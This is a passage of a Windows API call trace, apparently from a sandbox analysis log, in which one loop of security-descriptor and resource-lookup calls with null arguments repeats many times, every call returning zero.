ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.084] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.084] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.084] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.084] LockResource (hResData=0x0) returned 0x0 [0220.084] FreeResource (hResData=0x0) returned 0 [0220.084] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.084] LockResource (hResData=0x0) returned 0x0 [0220.084] FreeResource (hResData=0x0) returned 0 [0220.084] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.084] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.084] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.084] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.084] LockResource (hResData=0x0) returned 0x0 [0220.084] FreeResource (hResData=0x0) returned 0 [0220.084] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.084] LockResource (hResData=0x0) returned 0x0 [0220.084] FreeResource (hResData=0x0) returned 0 [0220.085] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.085] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.085] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.085] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.085] LockResource (hResData=0x0) returned 0x0 [0220.085] FreeResource (hResData=0x0) returned 0 [0220.085] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.085] LockResource (hResData=0x0) returned 0x0 [0220.085] FreeResource (hResData=0x0) returned 0 [0220.085] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.085] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.085] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.085] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.085] LockResource (hResData=0x0) returned 0x0 [0220.085] FreeResource (hResData=0x0) returned 0 [0220.085] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.085] LockResource (hResData=0x0) returned 0x0 [0220.085] FreeResource (hResData=0x0) returned 0 [0220.085] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.085] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.085] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.085] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.085] LockResource (hResData=0x0) returned 0x0 [0220.085] FreeResource (hResData=0x0) returned 0 [0220.085] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.085] LockResource (hResData=0x0) returned 0x0 [0220.085] FreeResource (hResData=0x0) returned 0 [0220.085] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.085] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.085] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.085] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.085] LockResource (hResData=0x0) returned 0x0 [0220.085] FreeResource (hResData=0x0) returned 0 [0220.085] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.085] LockResource (hResData=0x0) returned 0x0 [0220.086] FreeResource (hResData=0x0) returned 0 [0220.086] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.086] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.086] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.086] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.086] LockResource (hResData=0x0) returned 0x0 [0220.086] FreeResource (hResData=0x0) returned 0 [0220.086] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.086] LockResource (hResData=0x0) returned 0x0 [0220.086] FreeResource (hResData=0x0) returned 0 [0220.086] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.086] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.086] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.086] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.086] LockResource (hResData=0x0) returned 0x0 [0220.086] FreeResource (hResData=0x0) returned 0 [0220.086] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.086] LockResource (hResData=0x0) returned 0x0 [0220.086] FreeResource (hResData=0x0) returned 0 [0220.086] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.086] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.086] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.086] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.086] LockResource (hResData=0x0) returned 0x0 [0220.086] FreeResource (hResData=0x0) returned 0 [0220.086] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.086] LockResource (hResData=0x0) returned 0x0 [0220.086] FreeResource (hResData=0x0) returned 0 [0220.086] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.086] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.086] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.086] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.086] LockResource (hResData=0x0) returned 0x0 [0220.086] FreeResource (hResData=0x0) returned 0 [0220.086] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.086] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.087] LockResource (hResData=0x0) returned 0x0 [0220.087] FreeResource (hResData=0x0) returned 0 [0220.087] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.087] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.087] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.087] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.087] LockResource (hResData=0x0) returned 0x0 [0220.087] FreeResource (hResData=0x0) returned 0 [0220.087] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.087] LockResource (hResData=0x0) returned 0x0 [0220.087] FreeResource (hResData=0x0) returned 0 [0220.087] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.087] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.087] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.087] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.087] LockResource (hResData=0x0) returned 0x0 [0220.087] FreeResource (hResData=0x0) returned 0 [0220.087] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.087] LockResource (hResData=0x0) returned 0x0 [0220.087] FreeResource (hResData=0x0) returned 0 [0220.087] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.087] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.087] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.087] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.087] LockResource (hResData=0x0) returned 0x0 [0220.087] FreeResource (hResData=0x0) returned 0 [0220.087] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.087] LockResource (hResData=0x0) returned 0x0 [0220.087] FreeResource (hResData=0x0) returned 0 [0220.087] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.087] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.087] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.087] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.087] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.087] LockResource (hResData=0x0) returned 0x0 [0220.087] FreeResource (hResData=0x0) returned 0 [0220.087] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.088] LockResource (hResData=0x0) returned 0x0 [0220.088] FreeResource (hResData=0x0) returned 0 [0220.088] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.088] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.088] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.088] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.088] LockResource (hResData=0x0) returned 0x0 [0220.088] FreeResource (hResData=0x0) returned 0 [0220.088] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.088] LockResource (hResData=0x0) returned 0x0 [0220.088] FreeResource (hResData=0x0) returned 0 [0220.088] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.088] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.088] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.088] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.088] LockResource (hResData=0x0) returned 0x0 [0220.088] FreeResource (hResData=0x0) returned 0 [0220.088] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.088] LockResource (hResData=0x0) returned 0x0 [0220.088] FreeResource (hResData=0x0) returned 0 [0220.088] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.088] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.088] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.088] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.088] LockResource (hResData=0x0) returned 0x0 [0220.088] FreeResource (hResData=0x0) returned 0 [0220.088] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.088] LockResource (hResData=0x0) returned 0x0 [0220.088] FreeResource (hResData=0x0) returned 0 [0220.088] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.088] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.088] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.088] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.088] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.088] LockResource (hResData=0x0) returned 0x0 [0220.088] FreeResource (hResData=0x0) returned 0 [0220.089] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.089] LockResource (hResData=0x0) returned 0x0 [0220.089] FreeResource (hResData=0x0) returned 0 [0220.089] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.089] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.089] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.089] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.089] LockResource (hResData=0x0) returned 0x0 [0220.089] FreeResource (hResData=0x0) returned 0 [0220.089] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.089] LockResource (hResData=0x0) returned 0x0 [0220.089] FreeResource (hResData=0x0) returned 0 [0220.089] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.089] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.089] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.089] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.089] LockResource (hResData=0x0) returned 0x0 [0220.089] FreeResource (hResData=0x0) returned 0 [0220.089] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.089] LockResource (hResData=0x0) returned 0x0 [0220.089] FreeResource (hResData=0x0) returned 0 [0220.089] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.089] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.089] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.089] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.089] LockResource (hResData=0x0) returned 0x0 [0220.089] FreeResource (hResData=0x0) returned 0 [0220.089] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.089] LockResource (hResData=0x0) returned 0x0 [0220.089] FreeResource (hResData=0x0) returned 0 [0220.089] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.089] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.089] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.089] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.089] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.089] LockResource (hResData=0x0) returned 0x0 [0220.089] FreeResource (hResData=0x0) returned 0 [0220.090] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.090] LockResource (hResData=0x0) returned 0x0 [0220.090] FreeResource (hResData=0x0) returned 0 [0220.090] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.090] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.090] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.090] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.090] LockResource (hResData=0x0) returned 0x0 [0220.090] FreeResource (hResData=0x0) returned 0 [0220.090] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.090] LockResource (hResData=0x0) returned 0x0 [0220.090] FreeResource (hResData=0x0) returned 0 [0220.090] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.090] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.090] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.090] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.090] LockResource (hResData=0x0) returned 0x0 [0220.090] FreeResource (hResData=0x0) returned 0 [0220.090] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.090] LockResource (hResData=0x0) returned 0x0 [0220.090] FreeResource (hResData=0x0) returned 0 [0220.090] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.090] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.090] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.090] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.090] LockResource (hResData=0x0) returned 0x0 [0220.090] FreeResource (hResData=0x0) returned 0 [0220.090] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.090] LockResource (hResData=0x0) returned 0x0 [0220.090] FreeResource (hResData=0x0) returned 0 [0220.090] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.090] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.090] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.090] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.090] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.090] LockResource (hResData=0x0) returned 0x0 [0220.091] FreeResource (hResData=0x0) returned 0 [0220.091] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.091] LockResource (hResData=0x0) returned 0x0 [0220.091] FreeResource (hResData=0x0) returned 0 [0220.091] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.091] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, 